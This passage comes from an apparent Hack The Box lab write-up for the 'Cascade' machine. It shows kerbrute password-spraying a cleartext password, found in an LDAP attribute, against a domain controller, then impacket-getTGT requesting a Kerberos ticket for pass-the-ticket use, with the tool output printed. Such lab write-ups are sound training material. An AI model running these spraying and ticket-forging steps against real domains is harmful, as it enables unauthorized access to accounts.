Validation
The LDAP service running on the port 389 with anonymous access enabled allowed me to enumerate and get the detailed overview about the target domain. While doing so, I discovered that what appears to be a CLEARTEXT password hard-coded into one of the LDAP attributes of the r.thompson user. Here, I will attempt to validate the credential against the target KDC server and create a TGT for better OPSEC
┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ kerbrute passwordspray -d CASCADE.LOCAL --dc casc-dc1.cascade.local users 'rY4n5eva'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
version: v1.0.3 (9dad6e1) - 06/26/23 - Ronnie Flathers @ropnop
2023/06/26 05:40:25 > Using KDC(s):
2023/06/26 05:40:25 > casc-dc1.cascade.local:88
2023/06/26 05:40:35 > [+] VALID LOGIN: r.thompson@CASCADE.LOCAL:rY4n5eva
2023/06/26 05:40:45 > Done! Tested 17 logins (1 successes) in 20.781 secondsThe password indeed belongs to the r.thompson user
TGT
┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ impacket-getTGT CASCADE.LOCAL/r.thompson:rY4n5eva -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Saving ticket in r.thompson.ccacheTGT generated for the r.thompson user.
The TGT will allow me to continue the operation with the pass-the-ticket technique